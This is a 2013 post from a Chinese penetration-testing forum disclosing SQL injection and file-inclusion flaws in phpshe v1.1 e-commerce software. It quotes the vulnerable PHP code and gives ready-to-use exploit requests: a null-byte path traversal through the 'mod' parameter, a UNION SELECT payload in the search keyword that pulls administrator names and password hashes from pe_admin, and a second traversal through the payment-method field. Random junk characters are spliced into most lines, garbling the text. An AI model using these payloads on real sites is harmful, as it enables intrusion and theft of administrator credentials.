找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1962|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
/*******************************************************/. u6 C& ]/ X1 E6 K% G/ f
/* Phpshe v1.1 Vulnerability
2 ?, Q8 m8 b4 M* j! J! P/* ========================
6 c0 k8 ~9 c  C4 |) h3 R/* By: : Kn1f32 [- ]0 C; A1 Q
/* E-Mail : 681796@qq.com
% z6 l9 k: d0 [/*******************************************************/- z8 e) y: s3 `7 z# A- Y* r
0×00 整体大概参数传输4 N. V2 Y8 [( P- p

; |  ^, ?, V3 N' l) \& n+ G' q1 O4 r. i

6 S( A5 R2 f6 A, d* V//common.php" e: d5 n' B5 Q' w$ y
if (get_magic_quotes_gpc()) {& t! [; G8 n" t5 Y( ]. l
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');" u. T, y3 M" \. z9 A( C0 o+ T
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');2 W7 F7 a- w2 K& r
}
! M4 C! a. y( J- x$ h9 welse {# c) C& m4 v  W; L; c  |
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');; n3 d% S" W& ]8 D, K
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');# o% W) b, Y6 ?, E5 R
}5 N+ L& s) i* ~9 D& L
session_start();1 @6 ?( E% I5 e; l2 J5 I5 p( ~, ~
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');1 S( w0 E, @7 [3 U, h
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');- T/ E! F! U) e& Y% ~7 g: A
: `; H/ N5 v) i# u; Q2 f
0×01 包含漏洞
, @7 V- r$ i  h
* Y4 I- Z  C2 ~2 y" C( ]6 w% R0 [) `( D0 ]
//首页文件
9 F# g( o! L* D9 r+ s$ u: A* {3 f# ^<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
/ E8 j- p: @. a1 rinclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞# d4 Y# K8 i( \3 C/ |: ^: ~; q
pe_result();7 @: B- W: Y8 ^5 W( u
?>
9 ^" l  b. Y$ }( M4 O//common 文件 第15行开始
5 n8 V/ G5 F1 W( ~# S( surl路由配置' L6 X) c+ x" A5 c2 {  M" n
$module = $mod = $act = 'index';) A) b7 p1 b) q6 y" B) g
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
3 B9 U5 X% t* k) g$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);; }8 {+ N2 ]6 I0 Z6 v6 \7 g
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);3 d' V- l& h$ d2 c- A
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
  F% Q( X* V' _" Z) {


( ^. d# T4 w$ Z' X+ V0 N ; Q' l. O: h$ u3 {6 z/ H+ @- q
0×02 搜索注入
* F) K! C1 T; Z" h8 U, ]' D 9 r4 [0 O2 a# s7 R9 t1 ?+ o
<code id="code2">

//product.php文件
! {5 h+ e$ _2 o' K. J! C7 ccase 'list':
% a- Q* B; ^+ h; n$category_id = intval($id);, g' {( n# B' p: F3 I
$info = $db->pe_select('category', array('category_id'=>$category_id));( x& t2 E4 m  ^; j2 P3 h: H
//搜索
) s- W+ q5 N. P5 W$sqlwhere = " and `product_state` = 1";" c5 m) O* A  S1 W* e
pe_lead('hook/category.hook.php');
/ G* P7 X( h& j% L4 g0 R/ D; A1 @if ($category_id) {& i5 T2 i, t7 E9 S$ L  B
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
+ \8 \9 O* @8 [/ _. W}  w$ T  l6 }1 c. W; W' ^
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
! r, _6 ]9 {: Eif ($_g_orderby) {7 g; L! N% _6 H5 n3 n' K+ N4 j5 j
$orderby = explode('_', $_g_orderby);+ q2 }( t/ i, @& w% \
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
0 ^& [7 z; ~+ z# ]}" a4 e$ A4 C! U4 d+ b
else {4 O; [; @% K6 _4 s/ B
$sqlwhere .= " order by `product_id` desc";
# Y+ h. d! h4 p, E  |( ~}
% X4 K6 J1 t% }% ]- ?! O  c$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
: V1 f- ?/ ?& z; }( Y0 A; S- s6 R//热卖排行
8 S; V( @9 ?8 w+ q( E( k/ [$product_hotlist = product_hotlist();- d6 Y* G2 z3 y! }2 p: B7 M
//当前路径  E% W% z! [2 f" B
$nowpath = category_path($category_id);; g& l! u; }; ~. k/ b' D
$seo = pe_seo($info['category_name']);
  |, O9 K" W4 }1 _include(pe_tpl('product_list.html'));
1 S+ D6 ]8 R  ~1 N//跟进selectall函数库( {4 A, \+ |6 n( z- J% f
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())4 I1 \& A8 Q) x! I8 o' R9 x- s5 g
{1 C: h& {* g- X" q9 f# V0 u3 P
//处理条件语句9 k- ?8 K" O7 N& a5 G
$sqlwhere = $this->_dowhere($where);
% v3 F: @) l  ^# i5 P- ^& B, xreturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
" L+ A" T" o  b% `1 b}, s% j  M; Y% C* k
//exp
/ ^5 S$ U/ L6 Q! F7 d* Z. kproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
% \9 ^: m# T; k' m" m% }* Y

</code>, l8 W, I! x- `) A+ z( Z; J

0 w2 ?  S5 o+ P$ M$ p0×03 包含漏洞2
2 W" N; D& W7 N  x9 p! z# M ! R  F* e1 R. E0 l1 k& b; R. @, W3 W
<code id="code3">

//order.php

case 'pay':


) ]# E; ^6 l% c' r" b1 o9 _2 Y6 V$order_id = pe_dbhold($_g_id);


% l9 H* L0 i4 {' S/ S' p5 E$cache_payway = cache::get('payway');


& {3 D& Y. W1 R8 d  Y; qforeach($cache_payway as $k => $v) {

/ g" O8 i0 M( O! ?. Y# {9 N3 b. c
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


4 H4 f. U0 J: ?' A9 S/ gif ($k == 'bank') {

4 Z1 ]/ c3 n* Z1 [: |: p4 v
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


# v% g, F$ c$ @% R& [- j# H}


6 m1 C, _6 f1 A+ O}

+ E% x) I2 F* p
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

! v, A8 q8 e6 x8 z1 N; V
!$order['order_id'] && pe_error('订单号错误...');

/ H# v" h$ ^: U& D+ C* O7 ]: |( X
if (isset($_p_pesubmit)) {


. Z! R4 u  t* S8 D; W$ O1 s+ Xif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

5 _; A! Z  W) m6 H$ U" n  I9 H8 ]
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


: _( I+ ?' J- @* N% b) G) G6 uforeach ($info_list as $v) {


- h7 E8 n/ Q1 N0 y) T$order['order_name'] .= "{$v['product_name']};";# e2 j7 `5 N4 _0 |( G


, @9 D4 G0 d$ n) J  y}


( C7 w5 }9 W( t. ?2 a0 ]echo '正在为您连接支付网站,请稍后...';

% m) Z$ z4 E' Q: _
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


  j4 k: r5 v1 Q1 }. H}//当一切准备好的时候就可以进行"鸡肋包含了"

3 X! b% i9 c; A5 ^" S
else {

. W  k; N0 V2 o% H* P- s1 |
pe_error('支付错误...');

3 P' g1 d. _1 g- w; {
}

4 [* y5 M1 }  C2 {- P
}


, D' [! z1 B1 y; ^, c) N$seo = pe_seo('选择支付方式');


, x1 e. H  _  V+ s4 c9 Zinclude(pe_tpl('order_pay.html'));


% i* w, Y. D1 o, |  Nbreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>: o& e  W7 _( `1 e7 T
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表